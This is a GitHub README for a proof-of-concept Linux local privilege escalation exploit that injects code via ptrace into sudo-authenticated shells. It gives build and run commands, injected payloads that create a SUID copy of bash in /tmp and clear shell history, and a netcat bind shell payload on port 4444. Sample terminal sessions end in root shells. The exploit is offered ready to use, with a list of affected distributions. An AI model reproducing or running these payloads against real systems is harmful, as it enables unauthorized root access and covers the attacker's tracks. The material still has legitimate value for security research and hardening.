Skip to content

therealdreg/ptrace_misconfiguration_local_privilege_escalation

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

36 Commits

.github

.github

 
 

ptrex

ptrex

 
 

xpk

xpk

 
 

.gitattributes

.gitattributes

 
 

LICENSE

LICENSE

 
 

README.md

README.md

 
 

Repository files navigation

ptrace misconfiguration local privilege escalation

ptrace misconfiguration Local Privilege Escalation

Please, consider make a donation: https://github.com/sponsors/therealdreg

WARNING! this is a POC, the code is CRAP

why this POC? why ptrace for this? just for fun. I know, I know you can get the sudo control in other different ways x)

video demo on youtube: https://youtu.be/3Qmy1Y8W7A8

Injecting code via ptrace (with same user) in shells with sudo authenticated

Exploit Reqs:

  • ptrace enable to attach the processes of the user
  • terminal with a sudo user group (attacker)
  • terminal with the same user & sudo authenticated (victim)
  • run xpk or ptrex

WARNING: if GDB is installed in the machine is more safe run https://www.exploit-db.com/exploits/46989

'ptrace_scope' misconfiguration Local Privilege Escalation by Marcelo Vazquez (s4vitar) & Victor Lasa (vowkin)

my code is based in the s4vitar & vowkin POC and use ptrace (no GDB dep).

I made two POC-flavours for the same thing xpk.c & ptrex.c

Do you want a more advanced stuff? check https://github.com/David-Reguera-Garcia-Dreg/drx_ptrace_shellcode_injector

xpk.c

stdin hijack (using ptrace_do lib https://github.com/emptymonkey/ptrace_do): sudo -S cp /bin/bash /tmp + sudo -S chmod +s /tmp/bash + history -c

gcc -o xpk xpk.c
./xpk

WARNING: only works for x86_64 systems (ptrace_do limitation)

  • can inject code from x86_64-xpk-compiled to x86_64 process
  • can inject code from x86_64-xpk-compiled to x86 process

ptrex.c:

shellcode injection (using ptrace) execve(python -c import os; os.system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1"));

gcc -o ptrex ptrex.c
 ./ptrex

You can also inject your own python code:

./ptrex full_python_path newcmdline

Example with

  • own python binary (limit 150 bytes): /home/dreg/tmp/python
  • bind bash shell python code (limit 250 bytes) : import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")
./ptrex /home/dreg/tmp/python 'import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")'
  • works for x86_64 systems & x86 systems
  • can inject code from x86_64-ptrex-compiled to x86_64 process
  • can inject code from x86-ptrex-compiled to x86 process
  • can inject code from x86_64-ptrex-compiled to x86 process

WARNING: inject code from x86-ptrex-compiled to x86_x64 process is not possible

How to test xpk.c:

Open a terminal with a sudo user group

execute any command with sudo and enter the password, ex:

dreg@fr33project:~$ tty
/dev/pts/4
dreg@fr33project:~$ id
uid=1003(dreg) gid=1003(dreg) groups=1003(dreg),27(sudo)
dreg@fr33project:~$ sudo whoami
[sudo] password for dreg:
root
dreg@fr33project:~$

open other terminal with the same user and execute ./xpk (the name of the exploit executable is important, dont change!)

dreg@fr33project:~$ tty
/dev/pts/7
dreg@fr33project:~$ .gcc -o xpk xpk.c
dreg@fr33project:~$ ./xpk
David Reguera Garcia aka Dreg exploit without gdb dep, based in:
https://www.exploit-db.com/exploits/46989
'ptrace_scope' misconfiguration Local Privilege Escalation
Authors: Marcelo Vazquez  (s4vitar)
         Victor Lasa       (vowkin)

[*] PID -> bash
[*] Path 2660: /home/dreg
stdin fd: 4
echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap
[*] PID -> bash
[*] Path 2892: /home/dreg
stdin fd: 4
echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap
[*] PID -> sh
[*] Path 2998: /home/dreg
stdin fd: 4
echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap
[*] PID -> bash
[*] Path 2999: /home/dreg
stdin fd: 4
echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap

[*] Cleaning up...
[*] Spawning root shell...
bash-5.0# id
uid=1003(dreg) gid=1003(dreg) euid=0(root) egid=0(root) groups=0(root),27(sudo),1003(dreg)
bash-5.0# whoami
root
bash-5.0#

How to test ptrex.c:

Open a terminal with a sudo user group

execute any command with sudo and enter the password, ex:

dreg@fr33project:~$ tty
/dev/pts/4
dreg@fr33project:~$ id
uid=1003(dreg) gid=1003(dreg) groups=1003(dreg),27(sudo)
dreg@fr33project:~$ sudo whoami
[sudo] password for dreg:
root
dreg@fr33project:~$

open other terminal with the same user and execute ./ptrex

dreg@fr33project:~$ tty
/dev/pts/7
dreg@fr33project:~$ .gcc -o ptrex ptrex.c
dreg@fr33project:~$ ./ptrex
ptrex v0.3-beta - MIT License - Copyright 2020
David Reguera Garcia aka Dreg - dreg@fr33project.org
http://github.com/David-Reguera-Garcia-Dreg/ - http://www.fr33project.org/
-
ptrace misconfiguration Local Privilege Escalation
using ptrace (no GDB dep) execve
-
Based from: https://www.exploit-db.com/exploits/46989
'ptrace_scope' misconfiguration Local Privilege Escalation by Marcelo Vazquez (s4vitar) & Victor Lasa (vowkin)

To change default python path & cmd injected: ./ptrex full_python_path newcmdline
    example: ./ptrex /home/dreg/tmp/python 'import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")'

/proc/sys/kernel/yama/ptrace_scope : 0
pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d'
current pid: 18888
skipping current shell pid: 18888
current pid: 20156
elf plat: 64
waiting for process
getting registers
injecting shellcode at: 0x00007f33a88890e9
setting instruction pointer to: 0x00007f33a88890e9
runing
please wait...
found suid shell: /tmp/bash
rooting.....
/tmp/bash -p -c 'rm /tmp/bash ; tput cnorm && /bin/bash -p'

bash-5.0# whoami
root
bash-5.0#

If this fail, try the bind shell example

Example ptrex.c bind shell netcat

This example needs netcat installed in the machine

Open a terminal with a sudo user group

execute any command with sudo and enter the password, ex:

dreg@fr33project:~$ tty
/dev/pts/4
dreg@fr33project:~$ id
uid=1003(dreg) gid=1003(dreg) groups=1003(dreg),27(sudo)
dreg@fr33project:~$ sudo whoami
[sudo] password for dreg:
root
dreg@fr33project:~$

open other terminal with the same user and execute ./ptrex

dreg@fr33project:~$ tty
/dev/pts/7
dreg@fr33project:~$ .gcc -o ptrex ptrex.c
dreg@fr33project:~$ ./ptrex /usr/bin/python 'import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")'
dreg@fr33project:~$ nc 127.0.0.1 444
whoami
root

WORKING ON:

  • Parrot Home/Workstation: 4.6
  • Parrot Security: 4.6
  • CentOS / RedHat: 7.6
  • Kali Linux: 2018.4
  • Debian GNU/Linux: 10 (buster), 9.13 (stretch)

CONTRIBUTORS

nobody loves me

TODO

About

ptrace misconfiguration Local Privilege Escalation

rootkit.es/

Topics

linux x86-64 x86 privilege-escalation-linux ptrace-injection

Resources

Readme

License

MIT license
Activity

Stars

10 stars

Watchers

4 watching

Forks

2 forks
Report repository

Releases

No releases published

Sponsor this project

  •  
Learn more about GitHub Sponsors

Packages

No packages published

Languages